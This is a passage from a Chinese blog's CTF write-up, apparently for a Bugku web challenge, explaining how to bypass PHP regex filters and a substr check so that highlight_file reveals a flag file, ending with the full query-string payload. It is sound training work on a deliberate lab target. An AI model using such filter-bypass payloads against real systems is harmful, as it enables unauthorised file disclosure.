首先$zero,$first通过request传入一个参数，$second=zero.first,然后$second里必须匹配到/Yeedo|wants|a|girl|friend|a|or|flag|i这里面的字符，$key=$second,接着在$key里不能匹配到/...|flag/,然后$third=first,并且在$里要匹配有/\|\056\160\150\x70/i,$end从third里第五位字符开始截取。

seconde里要存在"/Yeedo|wants|a|girl|friend|or|a|flag/i"，而second=zero.first，所以zero=flag

key=second=zero.first，并且不能存在"/\.\.|flag/"，也就是说zero不能=flag，但可以看下面highlight_file(base64_decode($zero).$end)，会进行base64_decode，所以直接将’flag’进行base64加密得到ZmxhZw==

之后third=first，并且要匹配"/\\|\056\160\150\x70/i"，这是16进制与8进制，转换成10进制，再转成ascii码后即为|.php，但$end=substr($third,5);，故需要在|.php前面加上4个字符，来绕过substr，不过这4个字符得都是"/Yeedo|wants|a|girl|friend|or|a|flag/i"，这里面的（我这里给出一些字符:aaaa oror Flag girl ）这里用Flag的原因是不能匹配/\.\.|flag/，所以完整的payload为：

?zero=ZmxhZw==&first=aaaa（oror)|.php


## 总结：

阿西！这三天划水了，但还是总结一下吧：这几天在玩的时候，我学习到一些题目的做法（js,php代码审计，游戏题的情况，反序列化，bp使用，正则表达式，文件包含的复习，和一些小知识点)和遇到题目通常应该怎么做，学习写一些简单的py脚本。多练练题目，还得抽一些时间复习一下sql和几个靶场。


                
            </div>
            <hr/>

            

    <div class="reprint" id="reprint-statement">
        
            <div class="reprint__author">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-user">
                        Author:
                    </i>
                </span>
                <span class="reprint-info">
                    <a href="/about" rel="external nofollow noreferrer">hzk</a>
                </span>
            </div>
            <div class="reprint__type">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-link">
                        Link:
                    </i>
                </span>
                <span class="reprint-info">
                    <a href="http://example.com/2022/02/03/bugku-2/">http://example.com/2022/02/03/bugku-2/</a>
                </span>
            </div>
            <div class="reprint__notice">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-copyright">
                        Reprint policy:
                    </i>
                </span>
                <span class="reprint-info">
                    All articles in this blog are used except for special statements
                    <a href="https://creativecommons.org/licenses/by/4.0/deed.zh" rel="external nofollow noreferrer" target="_blank">CC BY 4.0</a>
                    reprint policy. If reproduced, please indicate source
                    <a href="/about" target="_blank">hzk</a>
                    !
                </span>
            </div>
        
    </div>

    <script async defer>
      document.addEventListener("copy", function (e) {
        let toastHTML = '<span>Copied successfully, please follow the reprint policy of this article</span><button class="btn-flat toast-action" onclick="navToReprintStatement()" style="font-size: smaller">more</a>';
        M.toast({html: toastHTML})
      });

      function navToReprintStatement() {
        $("html, body").animate({scrollTop: $("#reprint-statement").offset().top - 80}, 800);
      }
    </script>



            <div class="tag_share" style="display: block;">
                <div class="post-meta__tag-list" style="display: inline-block;">
                    
                        <div class="article-tag">
                            
                                <a href="/tags/ctf%E9%A2%98%E7%9B%AE-web/">
                                    <span class="chip bg-color">ctf题目--web</span>
                                </a>
                            
                        </div>
                    
                </div>
                <div class="post_share" style="zoom: 80%; width: fit-content; display: inline-block; float: right; margin: -0.15rem 0;">
                    <link rel="stylesheet" type="text/css" href="/libs/share/css/share.min.css">
<div id="article-share">

    
    <div class="social-share" data-sites="twitter,facebook,google,qq,qzone,wechat,weibo,douban,linkedin" data-wechat-qrcode-helper="<p>微信扫一扫即可分享！</p>"></div>
    <script src="/libs/share/js/social-share.min.js"></script>
    

    

</div>

                </div>
            </div>
            
                <style>
    #reward {
        margin: 40px 0;
        text-align: center;
    }

    #reward .reward-link {
        font-size: 1.4rem;
        line-height: 38px;
    }

    #reward .btn-floating:hover {
        box-shadow: 0 6px 12px rgba(0, 0, 0, 0.2), 0 5px 15px rgba(0, 0, 0, 0.2);
    }

    #rewardModal {
        width: 320px;
        height: 350px;
    }

    #rewardModal .reward-title {
        margin: 15px auto;
        padding-bottom: 5px;
    }

    #rewardModal .modal-content {
        padding: 10px;
    }

    #rewardModal .close {
        position: absolute;
        right: 15px;
        top: 15px;
        color: rgba(0, 0, 0, 0.5);
        font-size: 1.3rem;
        line-height: 20px;
        cursor: pointer;
    }

    #rewardModal .close:hover {
        color: #ef5350;
        transform: scale(1.3);
        -moz-transform:scale(1.3);
        -webkit-transform:scale(1.3);
        -o-transform:scale(1.3);
    }

    #rewardModal .reward-tabs {
        margin: 0 auto;
        width: 210px;
    }

    .reward-tabs .tabs {
        height: 38px;
        margin: 10px auto;
        padding-left: 0;
    }

    .reward-content ul {
        padding-left: 0 !important;
    }

    .reward-tabs .tabs .tab {
        height: 38px;
        line-height: 38px;
    }

    .reward-tabs .tab a {
        color: #fff;
        background-color: #ccc;
    }

    .reward-tabs .tab a:hover {
        background-color: #ccc;
        color: #fff;
    }

    .reward-tabs .wechat-tab .active {
        color: #fff !important;
        background-color: #22AB38 !important;
    }

    .reward-tabs .alipay-tab .active {
        color: #fff !important;
        background-color: #019FE8 !important;
    }

    .reward-tabs .reward-img {
        width: 210px;
        height: 210px;
    }
</style>

<div id="reward">
    <a href="#rewardModal" class="reward-link modal-trigger btn-floating btn-medium waves-effect waves-light red">赏</a>

    <!-- Modal Structure -->
    <div id="rewardModal" class="modal">
        <div class="modal-content">
            <a class="close modal-close"><i class="fas fa-times"></i></a>
            <h4 class="reward-title">你的赏识是我前进的动力</h4>
            <div class="reward-content">
                <div class="reward-tabs">
                    <ul class="tabs row">
                        <li class="tab col s6 alipay-tab waves-effect waves-light"><a href="#alipay">支付宝</a></li>
                        <li class="tab col s6 wechat-tab waves-effect waves-light"><a href="#wechat">微 信</a></li>
                    </ul>
                    <div id="alipay">
                        <img src="/medias/reward/alipay.jpg" class="reward-img" alt="支付宝打赏二维码">
                    </div>
                    <div id="wechat">
                        <img src="/medias/reward/wechat.png" class="reward-img" alt="微信打赏二维码">
                    </div>
                </div>
            </div>
        </div>
    </div>
</div>

<script>
    $(function () {
        $('.tabs').tabs();
    });
</script>

            
        </div>
    </div>

    

    

    

    

    

    

    

    

    

<article id="prenext-posts" class="prev-next articles">
    <div class="row article-row">
        
        <div class="article col s12 m6" data-aos="fade-up">
            <div class="article-badge left-badge text-color">
                <i class="fas fa-chevron-left"></i>&nbsp;Previous</div>
            <div class="card">
                <a href="/2022/02/04/bugku-3/">
                    <div class="card-image">
                        
                        
                        <img src="/medias/featureimages/20.jpg" class="responsive-img" alt="bugku-3">
                        
                        <span class="card-title">bugku-3</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary block-with-text">
                        
                            
                        
                    </div>
                    <div class="publish-info">
                        <span class="publish-date">
                            <i class="far fa-clock fa-fw icon-date"></i>2022-02-04
                        </span>
                        <span class="publish-author">
                            
                            <i class="fas fa-user fa-fw"></i>
                            hzk
                            
                        </span>
                    </div>
                </div>
                
                <div class="card-action article-tags">
                    
                    <a href="/tags/ctf%E9%A2%98%E7%9B%AE-web/">
                        <span class="chip bg-color">ctf题目--web</span>
                    </a>
                    
                </div>
                
            </div>
        </div>
        
        
        <div class="article col s12 m6" data-aos="fade-up">
            <div class="article-badge right-badge text-color">
                Next&nbsp;<i class="fas fa-chevron-right"></i>
            </div>
            <div class="card">
                <a href="/2022/01/31/bugku-1/">
                    <div class="card-image">
                        
                        
                        <img src="/medias/featureimages/14.jpg" class="responsive-img" alt="bugku(1)">
                        
                        <span class="card-title">bugku(1)</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary block-with-text">
                        
                            
                        
                    </div>
                    <div class="publish-info">
                            <span class="publish-date">
                                <i class="far fa-clock fa-fw icon-date"></i>2022-01-31
                            </span>
                        <span class="publish-author">
                            
                            <i class="fas fa-user fa-fw"></i>
                            hzk
                            
                        </span>
                    </div>
                </div>
                
                <div class="card-action article-tags">
                    
                    <a href="/tags/ctf%E9%A2%98%E7%9B%AE-web/">
                        <span class="chip bg-color">ctf题目--web</span>
                    </a>
                    
                </div>
                
            </div>
        </div>
        
    </div>
</article>

</div>



<!-- 代码块功能依赖 -->
<script type="text/javascript" src="/libs/codeBlock/codeBlockFuction.js"></script>

<!-- 代码语言 -->

<script type="text/javascript" src="/libs/codeBlock/codeLang.js"></script>


<!-- 代码块复制 -->

<script type="text/javascript" src="/libs/codeBlock/codeCopy.js"></script>


<!-- 代码块收缩 -->

<script type="text/javascript" src="/libs/codeBlock/codeShrink.js"></script>


    </div>
    <div id="toc-aside" class="expanded col l3 hide-on-med-and-down">
        <div class="toc-widget card" style="background-color: white;">
            <div class="toc-title"><i class="far fa-list-alt"></i>&nbsp;&nbsp;TOC</div>
            <div id="toc-content"></div>
        </div>
    </div>
</div>

<!-- TOC 悬浮按钮. -->

<div id="floating-toc-btn" class="hide-on-med-and-down">
    <a class="btn-floating btn-large bg-color">
        <i class="fas fa-list-ul"></i>
    </a>
</div>


<script src="/libs/tocbot/tocbot.min.js"></script>
<script>
    $(function () {
        tocbot.init({
            tocSelector: '#toc-content',
            contentSelector: '#articleContent',
            headingsOffset: -($(window).height() * 0.4 - 45),
            collapseDepth: Number('0'),
            headingSelector: 'h2, h3, h4'
        });

        // modify the toc link href to support Chinese.
        let i = 0;
        let tocHeading = 'toc-heading-';
        $('#toc-content a').each(function () {
            $(this).attr('href', '#' + tocHeading + (++i));
        });

        // modify the heading title id to support Chinese.
        i = 0;
        $('#articleContent').children('h2, h3, h4').each(function () {
            $(this).attr('id', tocHeading + (++i));
        });

        // Set scroll toc fixed.
        let tocHeight = parseInt($(window).height() * 0.4 - 64);
        let $tocWidget = $('.toc-widget');
        $(window).scroll(function () {
            let scroll = $(window).scrollTop();
            /* add post toc fixed. */
            if (scroll > tocHeight) {
                $tocWidget.addClass('toc-fixed');
            } else {
                $tocWidget.removeClass('toc-fixed');
            }
        });

        
        /* 修复文章卡片 div 的宽度. */
        let fixPostCardWidth = function (srcId, targetId) {
            let srcDiv = $('#' + srcId);
            if (srcDiv.length === 0) {
                return;
            }

            let w = srcDiv.width();
            if (w >= 450) {
                w = w + 21;
            } else if (w >= 350 && w < 450) {
                w = w + 18;
            } else if (w >= 300 && w < 350) {
                w = w + 16;
            } else {
                w = w + 14;
            }
            $('#' + targetId).width(w);
        };

        // 切换TOC目录展开收缩的相关操作.
        const expandedClass = 'expanded';
        let $tocAside = $('#toc-aside');
        let $mainContent = $('#main-content');
        $('#floating-toc-btn .btn-floating').click(function () {
            if ($tocAside.hasClass(expandedClass)) {
                $tocAside.removeClass(expandedClass).hide();
                $mainContent.removeClass('l9');
            } else {
                $tocAside.addClass(expandedClass).show();
                $mainContent.addClass('l9');
            }
            fixPostCardWidth('artDetail', 'prenext-posts');
        });
        
    });
</script>

    

</main>




    <footer class="page-footer bg-color">
    
        <link rel="stylesheet" href="/libs/aplayer/APlayer.min.css">
<style>
    .aplayer .aplayer-lrc p {
        
        display: none;
        
        font-size: 12px;
        font-weight: 700;
        line-height: 16px !important;
    }

    .aplayer .aplayer-lrc p.aplayer-lrc-current {
        
        display: none;
        
        font-size: 15px;
        color: #42b983;
    }

    
    .aplayer.aplayer-fixed.aplayer-narrow .aplayer-body {
        left: -66px !important;
    }

    .aplayer.aplayer-fixed.aplayer-narrow .aplayer-body:hover {
        left: 0px !important;
    }

    
</style>
<div class="">
    
    <div class="row">
        <meting-js class="col l8 offset-l2 m10 offset-m1 s12"
                   server="netease"
                   type="playlist"
                   id="503838841"
                   fixed='true'
                   autoplay='false'
                   theme='#42b983'
                   loop='all'
                   order='random'
                   preload='auto'
                   volume='0.7'
                   list-folded='true'
        >
        </meting-js>
    </div>
</div>

<script src="/libs/aplayer/APlayer.min.js"></script>
<script src="https://cdn.jsdelivr.net/npm/meting@2/dist/Meting.min.js"></script>

    

    <div class="container row center-align"
         style="margin-bottom: 0px !important;">
        <div class="col s12 m8 l8 copy-right">
            Copyright&nbsp;&copy;
            
                <span id="year">2019-2022</span>
            
            <span id="year">2019</span>
            <a href="/about" target="_blank">hzk</a>
            |&nbsp;Powered by&nbsp;<a href="https://hexo.io/" target="_blank">Hexo</a>
            |&nbsp;Theme&nbsp;<a href="https://github.com/blinkfox/hexo-theme-matery" target="_blank">Matery</a>
            <br>
            
            
            
                
            
            
                <span id="busuanzi_container_site_pv">
                &nbsp;|&nbsp;<i class="far fa-eye"></i>&nbsp;Total visits:&nbsp;
                    <span id="busuanzi_value_site_pv" class="white-color"></span>
            </span>
            
            
                <span id="busuanzi_container_site_uv">
                &nbsp;|&nbsp;<i class="fas fa-users"></i>&nbsp;Total visitors:&nbsp;
                    <span id="busuanzi_value_site_uv" class="white-color"></span>
            </span>
            
            <br>

            <!-- 运行天数提醒. -->
            
            <br>
            
        </div>
        <div class="col s12 m4 l4 social-link social-statis">
    <a href="https://github.com/shianer" class="tooltipped" target="_blank" data-tooltip="访问我的GitHub" data-position="top" data-delay="50">
        <i class="fab fa-github"></i>
    </a>



    <a href="mailto:292595085@qq.com" class="tooltipped" target="_blank" data-tooltip="邮件联系我" data-position="top" data-delay="50">
        <i class="fas fa-envelope-open"></i>
    </a>







    <a href="tencent://AddContact/?fromId=50&fromSubId=1&subcmd=all&uin=292595085" class="tooltipped" target="_blank" data-tooltip="QQ联系我: 292595085" data-position="top" data-delay="50">
        <i class="fab fa-qq"></i>
    </a>







    <a href="/atom.xml" class="tooltipped" target="_blank" data-tooltip="RSS 订阅" data-position="top" data-delay="50">
        <i class="fas fa-rss"></i>
    </a>

</div>
    </div>
</footer>

<div class="progress-bar"></div>


    <!-- 搜索遮罩框 -->
<div id="searchModal" class="modal">
    <div class="modal-content">
        <div class="search-header">
            <span class="title"><i class="fas fa-search"></i>&nbsp;&nbsp;Search</span>
            <input type="search" id="searchInput" name="s" placeholder="Please enter a search keyword"
                   class="search-input">
        </div>
        <div id="searchResult"></div>
    </div>
</div>

<script type="text/javascript">
$(function () {
    var searchFunc = function (path, search_id, content_id) {
        'use strict';
        $.ajax({
            url: path,
            dataType: "xml",
            success: function (xmlResponse) {
                // get the contents from search data
                var datas = $("entry", xmlResponse).map(function () {
                    return {
                        title: $("title", this).text(),
                        content: $("content", this).text(),
                        url: $("url", this).text()
                    };
                }).get();
                var $input = document.getElementById(search_id);
                var $resultContent = document.getElementById(content_id);
                $input.addEventListener('input', function () {
                    var str = '<ul class=\"search-result-list\">';
                    var keywords = this.value.trim().toLowerCase().split(/[\s\-]+/);
                    $resultContent.innerHTML = "";
                    if (this.value.trim().length <= 0) {
                        return;
                    }
                    // perform local searching
                    datas.forEach(function (data) {
                        var isMatch = true;
                        var data_title = data.title.trim().toLowerCase();
                        var data_content = data.content.trim().replace(/<[^>]+>/g, "").toLowerCase();
                        var data_url = data.url;
                        data_url = data_url.indexOf('/') === 0 ? data.url : '/' + data_url;
                        var index_title = -1;
                        var index_content = -1;
                        var first_occur = -1;
                        // only match artiles with not empty titles and contents
                        if (data_title !== '' && data_content !== '') {
                            keywords.forEach(function (keyword, i) {
                                index_title = data_title.indexOf(keyword);
                                index_content = data_content.indexOf(keyword);
                                if (index_title < 0 && index_content < 0) {
                                    isMatch = false;
                                } else {
                                    if (index_content < 0) {
                                        index_content = 0;
                                    }
                                    if (i === 0) {
                                        first_occur = index_content;
                                    }
                                }
                            });
                        }
                        // show search results
                        if (isMatch) {
                            str += "<li><a href='" + data_url + "' class='search-result-title'>" + data_title + "</a>";
                            var content = data.content.trim().replace(/<[^>]+>/g, "");
                            if (first_occur >= 0) {
                                // cut out 100 characters
                                var start = first_occur - 20;
                                var end = first_occur + 80;
                                if (start < 0) {
                                    start = 0;
                                }
                                if (start === 0) {
                                    end = 100;
                                }
                                if (end > content.length) {
                                    end = content.length;
                                }
                                var match_content = content.substr(start, end);
                                // highlight all keywords
                                keywords.forEach(function (keyword) {
                                    var regS = new RegExp(keyword, "gi");
                                    match_content = match_content.replace(regS, "<em class=\"search-keyword\">" + keyword + "</em>");
                                });

                                str += "<p class=\"search-result\">" + match_content + "...</p>"
                            }
                            str += "</li>";
                        }
                    });
                    str += "</ul>";
                    $resultContent.innerHTML = str;
                });
            }
        });
    };

    searchFunc('/search.xml', 'searchInput', 'searchResult');
});
</script>

    <!-- 回到顶部按钮 -->
<div id="backTop" class="top-scroll">
    <a class="btn-floating btn-large waves-effect waves-light" href="#!">
        <i class="fas fa-arrow-up"></i>
    </a>
</div>


    <script src="/libs/materialize/materialize.min.js"></script>
    <script src="/libs/masonry/masonry.pkgd.min.js"></script>
    <script src="/libs/aos/aos.js"></script>
    <script src="/libs/scrollprogress/scrollProgress.min.js"></script>
    <script src="/libs/lightGallery/js/lightgallery-all.min.js"></script>
    <script src="/js/matery.js"></script>

    <!-- Baidu Analytics -->

    <!-- Baidu Push -->

<script>
    (function () {
        var bp = document.createElement('script');
        var curProtocol = window.location.protocol.split(':')[0];
        if (curProtocol === 'https') {
            bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
        } else {
            bp.src = 'http://push.zhanzhang.baidu.com/push.js';
        }
        var s = document.getElementsByTagName("script")[0];
        s.parentNode.insertBefore(bp, s);
    })();
</script>

    
    <script src="/libs/others/clicklove.js" async="async"></script>
    
    
    <script async src="/libs/others/busuanzi.pure.mini.js"></script>
    

    

    

    <!--腾讯兔小巢-->
    
    

    

    

    
    <script src="/libs/instantpage/instantpage.js" type="module"></script>
    

</body>

</html>
